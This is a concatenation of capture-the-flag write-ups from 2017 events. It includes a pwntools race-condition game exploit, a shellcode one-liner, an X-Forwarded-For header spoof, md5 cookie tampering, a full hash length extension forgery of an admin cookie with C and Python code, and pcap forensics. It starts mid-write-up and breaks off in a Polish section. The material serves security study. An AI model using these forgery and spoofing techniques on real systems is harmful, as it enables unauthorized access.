(**calling cdqe before, converting the damage value into a signed 64 bit value**). If we're using a skill above 4 it won't convert the damage value and use the value as it is. This means, if we're using icesword, the binary is using the second damage calculation, interpreting the value as 64 bit 0xFFFFFFFF (resulting in 4294967295 damage, which means nothing to the current boss hp). But if we would be able to get it to use the first calculation it would convert the damage of icesword to a qword resulting in a 64 bit 0xFFFFFFFFFFFFFFFF (resulting in -1 damage, which would then be suctracted, and thus gets **added** onto the boss hp). Since the boss has 0x7FFFFFFFFFFFFFFF (9223372036854775807) HP , adding 1 to it, would let it "overflow" to 0x8000000000000000 (-9223372036854775808) HP, killing him instantenously. So what we need to do: - Let the binary think we're using a skill <= 4, to get into the first "calculation method"- Get over the negative damage check - Change the skill just before the damage gets subtracted from the boss hp by switching to icesword and attack with it The sleep from "Fireball" and "Icesword" is there to help with this. As soon as we reach level 4 we will change our attack pattern to: - Select "Fireball"- Use skill- Immediately change skill to "Ice sword"- Use skill If we manage to do this in the correct timing, this should do the following: - Enter the boss attack thread, trying to execute fireball- The fireball calculation will create some minor damage value, then sleep 1 second (giving us time to send another input)- The boss attack thread will then check, if we're using a skill below or equal to "4" (which fireball is)- While this is happening we're already switching our skill on the main thread to "Ice sword" and execute another attack- Since the damage from icesword will be calculated 1 second after fireball the chances are high, that we'll pass the "skill lock" and the "skill" check, and replace the player damage with 0xFFFFFFFF, which gets then converted to "-1" just before subtracting it from the boss hp. ```python if playerLevel == 4: # On level4 we can use icesword which results in -1 dmg r.recv(timeout=1) # Try to guess the boss attack, but this doesn't work reliable anymore since # fireball also adds another sleep, so we just have to hope ;-) bossAttack = libc.rand() & 3 libc.rand() & 3 libc.rand() & 3 libc.rand() & 3 useShield = getShieldToUse(bossAttack) # This will switch to fireball, attack and immediately switch $ # (while the attack thread is running and already passed the skill check) time.sleep(1) r.send("3\n2\n2\n%s\n" % str(useShield)) time.sleep(0.1) r.send("3\n7\n2\n1\n") checkForStates(r.recv()) time.sleep(10) counter += 1 if counter==2: # Hopefully we killed the boss here, executing cat /ho$ r.interactive() return``` Race conditions aren't always very predictable, but after two or three tries, the script resulted in a "boss kill", which rewarded us with another flag: ```bashYou use iceswordBoss hp is -9223372036854775808Contraturation! You win!You are already using the skill. Skill failed to use:icesword =============================s1mp13_rac3_c0nd1t10n_gam3_```
script:from pwn import *r = remote('i-am-the-shortest-6d15ba72.ctf.bsidessf.net',8890)r.recvuntil('.\n')r.sendline('\x48\x89\xf1\xcd\x80')r.interactive()
We were given a C (C++ in fact) code and that was all. Of course, my first idea was to start reading that cryptic code, deciphering its loops and so on. Sometime during the contest the admin posted this hint: HINT: It's much more than just a C program So, could it be something other than a C program? Let's see. The first thing that caught my C-eyes was that identation... sends shivers down the spine. Now wait a minute! Look at the whitespaces. It reminds me that esolang, *Whitespace*! And that was it indeed. The code was in the whitespaces, not the proper characters themselves. Using this interpreter http://ws2js.luilak.net/interpreter.html we got the flag. the_flag_is_WpUAItsadmhak
I found this when view source code: MmI0YjAzN2ZkMWYzMDM3NWU1Y2Q4NzE0NDhiNWI5NWM= . This is a base64 string, decode it we will have : coldplayparadiseBut when i put coldplay in username and paradise in password, the website give me that : Password: Mismatch in host table! Please contact your administrator for access. IP logged. It means my IP adress is not authorized yet. So i will cheat by adding X-Forwarded-For:127.0.0.1 header using Burpsuite, username still coldplay and password still paradiseTADADADADADA~~~~Result: The flag is: 4f9361b0302d4c2f2eb1fc308587dfd6
Hints : British Biscuit = Cookie.I try username=admin & password=admin, login success but it gives me that this is a limited user. Let check cookie:r - 351e766803d63c7ede8cb1e1c8db5e51c63fd47cffu - 351e76680321232f297a57a5a743894a0e4a801fc3we have similar string in both cookie : "351e766803". Put it away we will have a md5 string r - d63c7ede8cb1e1c8db5e51c63fd47cff = limitedu - 21232f297a57a5a743894a0e4a801fc3 = adminChange the cookie value r into md5(admin) and yup :Congratulations! The flag is: bb6df1e39bd297a47ed0eeaea9cac7ee
# Vhash (crypto 450p) ###ENG[PL](#pl-version) In the task we get access to a webpage where we can login as guest/guest and as a result we get a cookie containing: `SOME_LONG_HEX_HASH|username=guest&date=2017-02-13T23:45:45+0000&secret_length=8&` We also get to see the [source code](index.php) of the webpage and a [binary](vhash) which is used to generate the hash value. From analysis of the index page we can see that the hash value is generated with ```php function create_hmac($data) { return do_hash(SECRET . $data); } ``` So there is some secret glued in front of the cookie data and then `vhash` binary is execute on this input.When the website is authenticating us with the cookie it takes the cookie data, calculates the hash again and compares it agains what is in the cookie.The idea is that we can't modify the cookie value (eg, by setting username to `admin`) because the hash would have to be changed as well.And we can't calculate the proper hash without knowing the secret bytes added by the server. We notice that the server creates a map out of cookie parameters by parsing them in-order.As a result if a certain property is defined more than once, only the last value will get stored: ```php $pairs = explode('&', $cookie); $args = array(); foreach($pairs as $pair) { if(!strpos($pair, '=')) continue; list($name, $value) = explode('=', $pair, 2); $args[$name] = $value; } $username = $args['username'];``` So if we could append to the cookie `&username=administrator&` we would get past the security check! Once we reverse engineer vhash binary and analyse it, we can see that it is actually prone to `Hash Length Extension` attack.The general schema of the algorithm is: 1. Set initial state2. Split input into blocks3. For each block: - Take input block - Use `hash_update` to perform computations over the current state and input block - Save the results as new current state4. Finalize the algorithm by using `hash_update` with a certain fixed block dependent only on length of already hashed input5. Print current state as final hash We know that the cookie we get from the page is in fact hashed value of `secret+cookie_payload+final_hash_block`.If we now set this hash as `current state` of the hashing algorithm and perform `hash_update` with some additional payload we will actually get a proper hash value for `secret+cookie_payload+final_hash_block+additional_payload`!And since we know exactly how long this payload is, we can also add here the new `final_hash_block2`, as a result getting a proper hash value of `secret+cookie_payload+final_hash_block+additional_payload+final_hash_block2`.All of this without actually knowing the `secret` bytes at all, just the `state` of the algorithm. Now let's think what server will do if we pass as cookie payload string of `cookie_payload+final_hash_block+additional_payload`.The server will add secret bytes in front getting `secret+cookie_payload+final_hash_block+additional_payload` and then will hash it adding the final block at the end, which will result in `secret+cookie_payload+final_hash_block+additional_payload+final_hash_block2`.And this is exactly the same thing as we mentioned before!So by passing such input we can actually generate proper hash value without knowing the secret. We rewritten the hash algorithm into C to be able to test is easily: ```c#include <cstdint>#include <cstdio>#include <cstring>#include <x86intrin.h> struct vhash_ctx{ uint32_t state[32];}; inline unsigned int rol4(unsigned int value, int count) { return _rotl((unsigned int)value, count); } void vhash_init(vhash_ctx *vctx){ memcpy(vctx, "vhas", 4uLL); memcpy(&vctx->state[1], "h: r", 4uLL); memcpy(&vctx->state[2], "ock ", 4uLL); memcpy(&vctx->state[3], "hard", 4uLL); memcpy(&vctx->state[4], " 102", 4uLL); memcpy(&vctx->state[5], "4 bi", 4uLL); memcpy(&vctx->state[6], "t se", 4uLL); memcpy(&vctx->state[7], "curi", 4uLL); memcpy(&vctx->state[8], "ty. ", 4uLL); memcpy(&vctx->state[9], "For ", 4uLL); memcpy(&vctx->state[10], "thos", 4uLL); memcpy(&vctx->state[11], "e sp", 4uLL); memcpy(&vctx->state[12], "ecia", 4uLL); memcpy(&vctx->state[13], "l mo", 4uLL); memcpy(&vctx->state[14], "mome", 4uLL); memcpy(&vctx->state[15], "nts ", 4uLL); memcpy(&vctx->state[16], "when", 4uLL); memcpy(&vctx->state[17], " you", 4uLL); memcpy(&vctx->state[18], " nee", 4uLL); memcpy(&vctx->state[19], "d th", 4uLL); memcpy(&vctx->state[20], "robb", 4uLL); memcpy(&vctx->state[21], "ing ", 4uLL); memcpy(&vctx->state[22], "perf", 4uLL); memcpy(&vctx->state[23], "orma", 4uLL); memcpy(&vctx->state[24], "nce.", 4uLL); memcpy(&vctx->state[25], " Ask", 4uLL); memcpy(&vctx->state[26], " you", 4uLL); memcpy(&vctx->state[27], "r do", 4uLL); memcpy(&vctx->state[28], "ctor", 4uLL); memcpy(&vctx->state[29], " abo", 4uLL); memcpy(&vctx->state[30], "ut v", 4uLL); memcpy(&vctx->state[31], "hash", 4uLL);} void vhash_round(vhash_ctx *vctx){ for (int i = 0; i <= 31; ++i ) ++vctx->state[i]; for (int ia = 0; ia <= 31; ++ia ) { uint32_t v1 = rol4(vctx->state[ia], ia); vctx->state[ia] = v1; } for (int ib = 0; ib <= 31; ++ib ) vctx->state[ib] += vctx->state[((((unsigned int)((ib + 1) >> 31) >> 27) + (uint8_t)ib + 1) & 0x1F) - ((unsigned int)((ib + 1) >> 31) >> 27)]; for (int ic = 0; ic <= 31; ++ic ) vctx->state[ic] ^= vctx->state[((((unsigned int)((ic + 7) >> 31) >> 27) + (uint8_t)ic + 7) & 0x1F) - ((unsigned int)((ic + 7) >> 31) >> 27)]; uint32_t t = vctx->state[0]; for (int id = 0; id <= 30; ++id ) vctx->state[id] = vctx->state[id + 1]; vctx->state[31] = t;} void vhash_update(vhash_ctx *vctx, uint32_t (*in)[4]){ for (int i = 0; i <= 31; ++i ) vctx->state[i] += (*in)[((((unsigned int)((uint64_t)i >> 32) >> 30) + (uint8_t)i) & 3) - ((unsigned int)((uint64_t)i >> 32) >> 30)]; for (int ia = 0; ia <= 511; ++ia ) vhash_round(vctx); for (int ib = 0; ib <= 31; ++ib ) vctx->state[ib] ^= (*in)[((((unsigned int)((uint64_t)ib >> 32) >> 30) + (uint8_t)ib) & 3) - ((unsigned int)((uint64_t)ib >> 32) >> 30)]; for (int ic = 0; ic <= 511; ++ic ) vhash_round(vctx);} void vhash_final(vhash_ctx *vctx, uint32_t len){ uint32_t f[4]; f[0] = 2147483648; f[1] = len; f[2] = 0; f[3] = -1; vhash_update(vctx, (uint32_t (*)[4])f);} void print_hash(vhash_ctx *vctx){ for (int i = 0; i <= 7; ++i ) printf( "%08x%08x%08x%08x", vctx->state[4 * i], vctx->state[4 * i + 1], vctx->state[4 * i + 2], vctx->state[4 * i + 3]); printf("\n");} void process_data(const char *data, vhash_ctx* vctx, uint32_t &size, uint32_t len) { int done = 0; size= 0; uint32_t block[4]; while ( !done ) { memset(block, 0, 0x10uLL); for (int i = 0; (unsigned int)i <= 0xF; ++i ) { if ( size<len ) { uint8_t inbyte = data[size]; ++size; block[i / 4] |= inbyte << 8 * (3 - (char)i % 4); } else { done = 1; break; } } vhash_update(vctx, (uint32_t (*)[4])block); if(size==len){ done=1; } }} void hash(const char* data, uint32_t len) { vhash_ctx vctx; vhash_init(&vctx); uint32_t size; process_data(data, &vctx, size, len); vhash_final(&vctx, size); print_hash(&vctx);}``` And now with those primitives in place we created a function for generating the fake signature hash: ```cvoid rigged(vhash_ctx *vectx, const char* data, uint32_t len){ set_initial_state(vectx); uint32_t size; process_data(data, vectx, size, len); vhash_final(vectx, 120); print_hash(vectx);}``` What we do here is set the initial state from the cookie we have, then perform hashing step with our additional payload and then add the final block, using `120` as the size of the whole input because this is how long it should be.It is because the payload we are actually hashing has format: ```12345678username=guest&date=2017-02-14T00:22:54+0100&secret_length=8&\0\0\0\0\0\0\0\0\0\0\0\x80\x00\x00\x00\x00\x00\x00\x45\x00\x00\x00\x00\xff\xff\xff\xff&username=administrator&``` assuming `12345678` as secret.`\0` bytes comes from the padding added to the last input block when it gets hashed and `\x80\x00\x00\x00\x00\x00\x00\x45\x00\x00\x00\x00\xff\xff\xff\xff` is the final block added by the server to the initial cookie (notice 0x45 as input size). We used a small python script to generate the state initializer from cookie value: ```pythonfrom crypto_commons.generic import chunk def dump_state(data): print("\n".join(["vectx->state[" + str(i) + "] = 0x" + c + ";" for i, c in enumerate(chunk(data, 8))])) def main(): data = 'e4d6ed47e23694e76f8a611111fd7b52a980e40a718b28256342adc740814a09fa4592e434dbb0b2b5d3405dd554e5b40f432cfb7cbf6fe06d95ed16cc1f1b21f0d5f5b432b0e82c9ce0693ed4caca8cf7a035e48a29fc358d75bb0674d5e0b910252bfc1712a76698662a0ea4441183d4b3d7f1ade921ae47f0b0c641e25813' dump_state(data) main()``` and it generates the contents for `set_initial_state`: ```cvoid set_initial_state(const vhash_ctx *vectx) { vectx->state[0] = 0xe4d6ed47; vectx->state[1] = 0xe23694e7; vectx->state[2] = 0x6f8a6111; vectx->state[3] = 0x11fd7b52; vectx->state[4] = 0xa980e40a; vectx->state[5] = 0x718b2825; vectx->state[6] = 0x6342adc7; vectx->state[7] = 0x40814a09; vectx->state[8] = 0xfa4592e4; vectx->state[9] = 0x34dbb0b2; vectx->state[10] = 0xb5d3405d; vectx->state[11] = 0xd554e5b4; vectx->state[12] = 0x0f432cfb; vectx->state[13] = 0x7cbf6fe0; vectx->state[14] = 0x6d95ed16; vectx->state[15] = 0xcc1f1b21; vectx->state[16] = 0xf0d5f5b4; vectx->state[17] = 0x32b0e82c; vectx->state[18] = 0x9ce0693e; vectx->state[19] = 0xd4caca8c; vectx->state[20] = 0xf7a035e4; vectx->state[21] = 0x8a29fc35; vectx->state[22] = 0x8d75bb06; vectx->state[23] = 0x74d5e0b9; vectx->state[24] = 0x10252bfc; vectx->state[25] = 0x1712a766; vectx->state[26] = 0x98662a0e; vectx->state[27] = 0xa4441183; vectx->state[28] = 0xd4b3d7f1; vectx->state[29] = 0xade921ae; vectx->state[30] = 0x47f0b0c6; vectx->state[31] = 0x41e25813;}``` Now we just need to run `rigged(&vctx,"&username=administrator&", 24);` and it will print the proper hash value. Last step was just to send this to the game server with: ```pythonimport urllibimport requests def main(): cookies = {"auth": urllib.quote_plus( "39005958a36fcfabc56482ef87d46c3e1aec3c7babbc487dfc73d5c48441f24e67ffb44a2814be8e2e890e282188430b442ec8bea4c18a80cf03568de70b98234395e39a75a541290cf419680a436ec1bc6da7730a130fa71f947b3f43c86c40b5eb983934bc57cbd0802795b5a8760277ff9aa0bdcdc84fa8b20c7eab97af03|username=guest&date=2017-02-13T23:45:45+0000&secret_length=8&\0\0\0\0\0\0\0\0\0\0\0\x80\x00\x00\x00\x00\x00\x00\x45\x00\x00\x00\x00\xff\xff\xff\xff&username=administrator&")} result = requests.get("http://thenewandlessbrokenvhash.ctf.bsidessf.net:9292/index.php", cookies=cookies) print(result.content) main()``` And it gave us `FLAG:06c211f73f4f5ba198c7fb56145b39a2` in response. ###PL version W zadaniu dostajemy dostęp do strony gdzie możemy zalogować się jako guest/guest a jako wynik dostajemy cookie zawierące: `SOME_LONG_HEX_HASH|username=guest&date=2017-02-13T23:45:45+0000&secret_length=8&` Dostajemy też [kod strony](index.php) oraz [binarke](vhash) która jest użyta do generowania hasha. Z analizy strony php możemy zauważyć, że hash jest generowany przez: ```php function create_hmac($data) { return do_hash(SECRET . $data); } ``` Więc jest pewna sekretna wartość doklejana na początku danych cookie a następnie `vhash` jest uruchamiany na takim wejściu.Kiedy strona autentykuje nas za pomocą cookie, bierze dane, wylicza hasha i porównuje z tym co zapisane w cookie.Idea jest taka, ze nie możemy zmienić wartości w cookie (np. ustawić username na `admin`) bo hash też trzeba by odpowiednio zmienić.A nie możemy obliczyć tego nowego hasha bez znajomości sekretnych bajtów doklejanych przez serwer. Zauważamy dodatkowo że serwer tworzy mapę z parametrów w cookie parsując je w kolejności.To oznacza, że jeśli jakiś parametr występuje więcej niż raz to tylko jego ostatnia wartość będzie zapisana: ```php $pairs = explode('&', $cookie); $args = array(); foreach($pairs as $pair) { if(!strpos($pair, '=')) continue; list($name, $value) = explode('=', $pair, 2); $args[$name] = $value; } $username = $args['username'];``` Więc gdybyśmy mogli dodać do cookie `&username=administrator&` przeszlibyśmy sprawdzenie tożsamości! Po zreversowaniu binarki vhash i wstępnej analizie doszliśmy do wniosku, że algorytm jest podatny na atak `Hash Length Extension`.Generaly przebieg algorytmu to: 1. Ustaw stan początkowy2. Podziel dane na bloki3. Dla każdego bloku - Weź blok - Użyj `hash_update` żeby wykonać obliczenia na aktualnym stanie oraz bloku wejściowym - Zapisz wyniki jako nowy stan4. Zakończ algorytm poprzez `hash_update` z pewnym stałym blokiem zaleznym jedynie od długosci hashowanego inputu.5. Wypisz aktualny stan jako końcowy hash. Wiemy że cookie które dostajemy ze strony to w rzeczywistości wynik hashowania `secret+cookie_payload+final_hash_block`.Jeśli ustawimy ten hash jako aktualny stan algorytmu i wykonamy `hash_update` z jakimś dodatkowym payloadem to dostaniemy poprawny hash dla danych `secret+cookie_payload+final_hash_block+additional_payload`!A skoro wiem też jaką długość ma cały ten payload to możemy dodać też nowy `final_hash_block2`, w rezultacie uzyskując poprawny hash dla `secret+cookie_payload+final_hash_block+additional_payload+final_hash_block2`.I to wszystko bez znajomosci bajtów oznaczonych jako `secret`, tylko dzięki znajomości stanu algorytmu. Zastanówmy się teraz co się stanie jeśli wyślemy do serwera jako dane `cookie_payload+final_hash_block+additional_payload`.Serwer doda do tego sekretne bajty dostając `secret+cookie_payload+final_hash_block+additional_payload` a potem zahashuje dodając na końcu finalny blok, dostając tym samym hash dla result in `secret+cookie_payload+final_hash_block+additional_payload+final_hash_block2`.A to jest dokładnie to samo o czym napisaliśmy wyżej!Więc wysyłając takie dane możemy wygenerować lokalnie poprawny hash nie znając sekretu. Przepisaliśmy algorytm hashowania do C żeby móc wygodnie to testować: ```c#include <cstdint>#include <cstdio>#include <cstring>#include <x86intrin.h> struct vhash_ctx{ uint32_t state[32];}; inline unsigned int rol4(unsigned int value, int count) { return _rotl((unsigned int)value, count); } void vhash_init(vhash_ctx *vctx){ memcpy(vctx, "vhas", 4uLL); memcpy(&vctx->state[1], "h: r", 4uLL); memcpy(&vctx->state[2], "ock ", 4uLL); memcpy(&vctx->state[3], "hard", 4uLL); memcpy(&vctx->state[4], " 102", 4uLL); memcpy(&vctx->state[5], "4 bi", 4uLL); memcpy(&vctx->state[6], "t se", 4uLL); memcpy(&vctx->state[7], "curi", 4uLL); memcpy(&vctx->state[8], "ty. ", 4uLL); memcpy(&vctx->state[9], "For ", 4uLL); memcpy(&vctx->state[10], "thos", 4uLL); memcpy(&vctx->state[11], "e sp", 4uLL); memcpy(&vctx->state[12], "ecia", 4uLL); memcpy(&vctx->state[13], "l mo", 4uLL); memcpy(&vctx->state[14], "mome", 4uLL); memcpy(&vctx->state[15], "nts ", 4uLL); memcpy(&vctx->state[16], "when", 4uLL); memcpy(&vctx->state[17], " you", 4uLL); memcpy(&vctx->state[18], " nee", 4uLL); memcpy(&vctx->state[19], "d th", 4uLL); memcpy(&vctx->state[20], "robb", 4uLL); memcpy(&vctx->state[21], "ing ", 4uLL); memcpy(&vctx->state[22], "perf", 4uLL); memcpy(&vctx->state[23], "orma", 4uLL); memcpy(&vctx->state[24], "nce.", 4uLL); memcpy(&vctx->state[25], " Ask", 4uLL); memcpy(&vctx->state[26], " you", 4uLL); memcpy(&vctx->state[27], "r do", 4uLL); memcpy(&vctx->state[28], "ctor", 4uLL); memcpy(&vctx->state[29], " abo", 4uLL); memcpy(&vctx->state[30], "ut v", 4uLL); memcpy(&vctx->state[31], "hash", 4uLL);} void vhash_round(vhash_ctx *vctx){ for (int i = 0; i <= 31; ++i ) ++vctx->state[i]; for (int ia = 0; ia <= 31; ++ia ) { uint32_t v1 = rol4(vctx->state[ia], ia); vctx->state[ia] = v1; } for (int ib = 0; ib <= 31; ++ib ) vctx->state[ib] += vctx->state[((((unsigned int)((ib + 1) >> 31) >> 27) + (uint8_t)ib + 1) & 0x1F) - ((unsigned int)((ib + 1) >> 31) >> 27)]; for (int ic = 0; ic <= 31; ++ic ) vctx->state[ic] ^= vctx->state[((((unsigned int)((ic + 7) >> 31) >> 27) + (uint8_t)ic + 7) & 0x1F) - ((unsigned int)((ic + 7) >> 31) >> 27)]; uint32_t t = vctx->state[0]; for (int id = 0; id <= 30; ++id ) vctx->state[id] = vctx->state[id + 1]; vctx->state[31] = t;} void vhash_update(vhash_ctx *vctx, uint32_t (*in)[4]){ for (int i = 0; i <= 31; ++i ) vctx->state[i] += (*in)[((((unsigned int)((uint64_t)i >> 32) >> 30) + (uint8_t)i) & 3) - ((unsigned int)((uint64_t)i >> 32) >> 30)]; for (int ia = 0; ia <= 511; ++ia ) vhash_round(vctx); for (int ib = 0; ib <= 31; ++ib ) vctx->state[ib] ^= (*in)[((((unsigned int)((uint64_t)ib >> 32) >> 30) + (uint8_t)ib) & 3) - ((unsigned int)((uint64_t)ib >> 32) >> 30)]; for (int ic = 0; ic <= 511; ++ic ) vhash_round(vctx);} void vhash_final(vhash_ctx *vctx, uint32_t len){ uint32_t f[4]; f[0] = 2147483648; f[1] = len; f[2] = 0; f[3] = -1; vhash_update(vctx, (uint32_t (*)[4])f);} void print_hash(vhash_ctx *vctx){ for (int i = 0; i <= 7; ++i ) printf( "%08x%08x%08x%08x", vctx->state[4 * i], vctx->state[4 * i + 1], vctx->state[4 * i + 2], vctx->state[4 * i + 3]); printf("\n");} void process_data(const char *data, vhash_ctx* vctx, uint32_t &size, uint32_t len) { int done = 0; size= 0; uint32_t block[4]; while ( !done ) { memset(block, 0, 0x10uLL); for (int i = 0; (unsigned int)i <= 0xF; ++i ) { if ( size<len ) { uint8_t inbyte = data[size]; ++size; block[i / 4] |= inbyte << 8 * (3 - (char)i % 4); } else { done = 1; break; } } vhash_update(vctx, (uint32_t (*)[4])block); if(size==len){ done=1; } }} void hash(const char* data, uint32_t len) { vhash_ctx vctx; vhash_init(&vctx); uint32_t size; process_data(data, &vctx, size, len); vhash_final(&vctx, size); print_hash(&vctx);}``` A teraz mając powyższe prymitywy mogliśmy napisać funkcje generującą fałszywy hash: ```cvoid rigged(vhash_ctx *vectx, const char* data, uint32_t len){ set_initial_state(vectx); uint32_t size; process_data(data, vectx, size, len); vhash_final(vectx, 120); print_hash(vectx);}``` Ustawiamy tutaj początkowy stan wzięty z cookie ze strony, następnie wykonujemy update z naszym dodatkowym payloadem a potem dodajemy finalny blok używając `120` jako długości całych danych, bo tyle będą teraz miały.Jest tak ponieważ dane które hashuje serwer mają postać: ```12345678username=guest&date=2017-02-14T00:22:54+0100&secret_length=8&\0\0\0\0\0\0\0\0\0\0\0\x80\x00\x00\x00\x00\x00\x00\x45\x00\x00\x00\x00\xff\xff\xff\xff&username=administrator&``` zakładając `12345678` jako `secret`.Bajty `\0` biorą sie z paddingu dodanego do ostatniego bloku kiedy jest on hashowany a `\x80\x00\x00\x00\x00\x00\x00\x45\x00\x00\x00\x00\xff\xff\xff\xff` to finalny blok dodany przez serwer to początkowego cookie (0x45 to rozmiar danych w tym przypadku). Użyliśmy krótkiego kodu pythona żeby wygenerować początkowy stan z cookie: ```pythonfrom crypto_commons.generic import chunk def dump_state(data): print("\n".join(["vectx->state[" + str(i) + "] = 0x" + c + ";" for i, c in enumerate(chunk(data, 8))])) def main(): data = 'e4d6ed47e23694e76f8a611111fd7b52a980e40a718b28256342adc740814a09fa4592e434dbb0b2b5d3405dd554e5b40f432cfb7cbf6fe06d95ed16cc1f1b21f0d5f5b432b0e82c9ce0693ed4caca8cf7a035e48a29fc358d75bb0674d5e0b910252bfc1712a76698662a0ea4441183d4b3d7f1ade921ae47f0b0c641e25813' dump_state(data) main()``` a to daje nam zawartość dla funkcji `set_initial_state`: ```cvoid set_initial_state(const vhash_ctx *vectx) { vectx->state[0] = 0xe4d6ed47; vectx->state[1] = 0xe23694e7; vectx->state[2] = 0x6f8a6111; vectx->state[3] = 0x11fd7b52; vectx->state[4] = 0xa980e40a; vectx->state[5] = 0x718b2825; vectx->state[6] = 0x6342adc7; vectx->state[7] = 0x40814a09; vectx->state[8] = 0xfa4592e4; vectx->state[9] = 0x34dbb0b2; vectx->state[10] = 0xb5d3405d; vectx->state[11] = 0xd554e5b4; vectx->state[12] = 0x0f432cfb; vectx->state[13] = 0x7cbf6fe0; vectx->state[14] = 0x6d95ed16; vectx->state[15] = 0xcc1f1b21; vectx->state[16] = 0xf0d5f5b4; vectx->state[17] = 0x32b0e82c; vectx->state[18] = 0x9ce0693e; vectx->state[19] = 0xd4caca8c; vectx->state[20] = 0xf7a035e4; vectx->state[21] = 0x8a29fc35; vectx->state[22] = 0x8d75bb06; vectx->state[23] = 0x74d5e0b9; vectx->state[24] = 0x10252bfc; vectx->state[25] = 0x1712a766; vectx->state[26] = 0x98662a0e; vectx->state[27] = 0xa4441183; vectx->state[28] = 0xd4b3d7f1; vectx->state[29] = 0xade921ae; vectx->state[30] = 0x47f0b0c6; vectx->state[31] = 0x41e25813;}``` Teraz zostaje już tylko uruchomić `rigged(&vctx,"&username=administrator&", 24);` a to wypisze nam poprawny hash. Ostatni krok to wysłanie nowych danych razem z hashem na serwer: ```pythonimport urllibimport requests def main(): cookies = {"auth": urllib.quote_plus( "39005958a36fcfabc56482ef87d46c3e1aec3c7babbc487dfc73d5c48441f24e67ffb44a2814be8e2e890e282188430b442ec8bea4c18a80cf03568de70b98234395e39a75a541290cf419680a436ec1bc6da7730a130fa71f947b3f43c86c40b5eb983934bc57cbd0802795b5a8760277ff9aa0bdcdc84fa8b20c7eab97af03|username=guest&date=2017-02-13T23:45:45+0000&secret_length=8&\0\0\0\0\0\0\0\0\0\0\0\x80\x00\x00\x00\x00\x00\x00\x45\x00\x00\x00\x00\xff\xff\xff\xff&username=administrator&")} result = requests.get("http://thenewandlessbrokenvhash.ctf.bsidessf.net:9292/index.php", cookies=cookies) print(result.content) main()``` Co daje name `FLAG:06c211f73f4f5ba198c7fb56145b39a2` w odpowiedzi.
# BsidesSF 2017 - shattered (forensics, 200 pts) >We think we found how they're exfiltrating our data. One of the network engineers located a bizzare flow that looks designed to bypass our DLP system. Can you figure out what they were leaking this time? >[shattered.pcapng](shattered.pcapng) The file we get is a packet capture file full of retransmitted packets, the traffic looks scrambled, and the sequence numbers are mixed up. There is a great tool called [tcpflow](http://www.circlemud.org/jelson/software/tcpflow/) that can be used to recontruct it. After loading the PCAP in Wireshark to convert it to a native tcpdump PCAP: ```$ tcpflow -d2 -r shattered.pcaptcpflow: retrying_open ::open(fn=004.005.006.007.12345-008.009.010.011.02355,oflag=xc2,mask:x1b6)=5tcpflow: Open FDs at end of processing: 1tcpflow: demux.max_open_flows: 1tcpflow: Flow map size at end of processing: 1tcpflow: Flows seen: 1tcpflow: Total flows processed: 1tcpflow: Total packets processed: 1821 $ file 004.005.006.007.12345-008.009.010.011.02355004.005.006.007.12345-008.009.010.011.02355: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 564x572, frames 3``` ![](004.005.006.007.12345-008.009.010.011.02355.jpg?raw=true)
# Woodstock (forensics) ###ENG[PL](#pl-version) In the task we get a [pcap](ws1_2.pcapng).If we just run strings or search on it we can get the first flag `BITSCTF{such_s3cure_much_w0w}`. The second flag is more complex to get here.In the pcap we can see that there are 2 users interacting over some DC++/ADC hub and exchanging a `fl3g.txt` file.After analysing the input file and reading on the ADC protocol we finally figured out that the file transfer part is actually missing from the pcap.The only thing we can recover (eg. with binwalk, or by decoding zlib streams transferred) are file lists: ```xml <FileListing Version="1" CID="IW27TT3CMX5NKVCSVJ2CFJYSVUUC6CB43FF3XLA" Base="/" Generator="EiskaltDC++ 2.2.9"><Directory Name="cadence"></Directory><Directory Name="DSP"></Directory><Directory Name="DC"> <File Name="DEFCON 19 - The Art of Trolling (w speaker)-AHqGV5WjS4w.mp4" Size="98273830" TTH="KEVJ3EBNSE6XXLTPVCB5WUDMS5KR7P32MJQCGWY"/> <File Name="Fallen Kingdom - The Complete Minecraft Music Video Series-ayl3UXKpH1g.mp4" Size="511422768" TTH="M5PWQCU5AUV5L4A367BLGWWAYD5U3NUAVDTDQMI"/> <File Name="fl3g.txt" Size="14" TTH="CA4CMF34SHRUQIBG6MNRDAI5BVT7HQQRTGC7TBA"/> <File Name="Man punches a kangaroo in the face to rescue his dog (Original HD)-FIRT7lf8byw.mkv" Size="69864590" TTH="SOQ7ECDJ6YWM5F5Z3XLXGOFM6J23FOKNKWW5PXY"/> <File Name="poster.jpeg" Size="89139" TTH="IPLZJ2E4VJC4Q5X5NQ5D43COFAU3CGSZ5NQWJVA"/> <File Name="small2.jpg" Size="669170" TTH="K53V57ZPPJUOT5CAUP6DM3BAZI4YMUU536OYD3Q"/> <File Name="This Week in Stupid (04_12_2016)-m8LJl98_H60.mkv" Size="252235314" TTH="56UJJZ32LDK7V7QR5PZKPT7N2VOKPCY6WBZX3JA"/> <File Name="TRUMP UP THE JAMS! - The Fallout of the 2016 Election-jPLQh70GNrA.mkv" Size="274708751" TTH="YXPU6LCXAH5AY6I63KTJ4I3Q36YMZEXYEPGS6MQ"/> <File Name="when leftists attack - SJWs confront man over MAGA shirt-l4L-fk1dWhs.mp4" Size="122011301" TTH="B3W7EZGS2VMUG6B773WCQKPQ24G77R2EDDASJII"/></Directory></FileListing>``` and ```xml <FileListing Version="1" CID="AH3KWVYA5DAWJA7HAVHXC6BCLPNG34PVQVMPXPY" Base="/" Generator="EiskaltDC++ 2.2.9"><Directory Name="dcpp"> <File Name="text" Size="14" TTH="CA4CMF34SHRUQIBG6MNRDAI5BVT7HQQRTGC7TBA"/></Directory></FileListing>``` We notice that the file size if 14 bytes, and we know that the flag contains `BITSCTF{}`, so in fact we're missing only 5 bytes.Fortunately admin disclosed that there is a trailing `\n` in the file, so in fact we're missing only 4 bytes!And we know the TTH hash of the flag file, so we can now brute-force the contents. We had some issues with finding a proper code for this task, because different tools/libs were giving different hash results but we finally found a tool http://directory.fsf.org/wiki/Tthsum which seemed to do the trick. We used ramdisk to create temp files with potential flags and tested if the resulting hashes match the hash we have.After a while we finally got the flag `BITSCTF{sw3g}` ###PL version W zadaniu dostajemy [pcapa](ws1_2.pcapng).Jeśli tylko uruchomimy na nim strings albo wyszukiwarke to znajdujemy pierwszą flagę `BITSCTF{such_s3cure_much_w0w}`. Druga flaga była trochę bardziej skomplikowana.W pcapie mamy interakcje dwóch użytkowników za pomocą huba DC++/ADC i wymianę pliku `fl3g.txt`.Po dogłębnej analizie pcapa i protokołu ADC doszliśmy do tego, że transferu pliku w pcapie nie ma.Jedyne co możemy odzyskać to listy plików (np. przez binwalka lub dekodując 